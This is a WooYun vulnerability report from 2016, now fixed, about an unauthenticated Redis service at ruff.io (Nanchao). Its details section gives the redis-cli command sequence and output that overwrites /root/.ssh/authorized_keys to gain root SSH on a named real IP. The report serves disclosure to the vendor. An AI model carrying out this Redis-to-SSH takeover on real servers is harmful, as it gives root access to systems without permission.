当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0173975

漏洞标题:ruff.io某配置不当一枚(南潮:厉哥的嵌入式智能硬件开发公司)

相关厂商:ruff.io

漏洞作者: 爱上平顶山

提交时间:2016-02-01 12:50

修复时间:2016-02-01 17:09

公开时间:2016-02-01 17:09

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:8

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-01: 细节已通知厂商并且等待厂商处理中
2016-02-01: 厂商已经确认,细节仅向厂商公开
2016-02-01: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

南潮
公司简介
我们是一家专注于简化智能硬件开发的互联网公司,欢迎愿意不断学习成长,挑战自己舒适区的人与我们一起并肩奋战。
Ruff团队的软件工程师致力于研发下一代的硬件开发技术,力图使用软件重新定义硬件。我们相信,亿万的家庭,以及不计其数的商业环境,甚至是工业生产的状况,都将会因我们的努力而得到改变。
我们的研究领域从颠覆式的集成电路创新,MEMS设计到操作系统内核的定制优化,以及编译器和COQ、DSL的实践,当然,云计算这么热门的领域我们也不会错过。
我们将面对并发、稳定、低功耗等方面的挑战,尽可能降低成本,优化性能,我们将服务于全新的智能硬件,引领新时代的人机交互。我们的未来不仅涉及计算机科学,更会涉足人们生活的方方面面。
公司愿景
让智能硬件开发更简单!

详细说明:

南潮
域名 ruff.io nanchao.org
随便找下:
http://101.198.156.146:6001/ 看了下 恩 是的
然后:

redis未授权访问
101.198.156.146 6379


root@kali2:~# redis-cli -h 101.198.156.146
101.198.156.146:6379> config set dir /root/.ssh/
OK
101.198.156.146:6379> config get dir
1) "dir"
2) "/root/.ssh"
101.198.156.146:6379> config set dbfilename "authorized_keys"
OK
101.198.156.146:6379> save
OK
101.198.156.146:6379>
root@kali2:~/.ssh# cat redis.txt | redis-cli -h 101.198.156.146 -x set crackit
OK
root@kali2:~/.ssh# ssh -i id_rsa root@101.198.156.146
The authenticity of host '101.198.156.146 (101.198.156.146)' can't be established.
ECDSA key fingerprint is d3:ce:17:b8:5a:c3:bf:f7:39:3d:15:34:75:b9:0c:60.
Are you sure you want to continue connecting (yes/no)? yes
。。。


看下传上去没用:

XR@1VF(SA}B@J2]6%2]H14S.jpg


ok 上去了 不深入
http://121.201.7.93:3000/ 开了注册 干嘛的。

漏洞证明:

···

修复方案:

厉哥抽空内部安全培训

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-02-01 17:08

厂商回复:

谢谢 , 厉哥会加强内部安全培训的.

最新状态:

2016-02-01:现已修复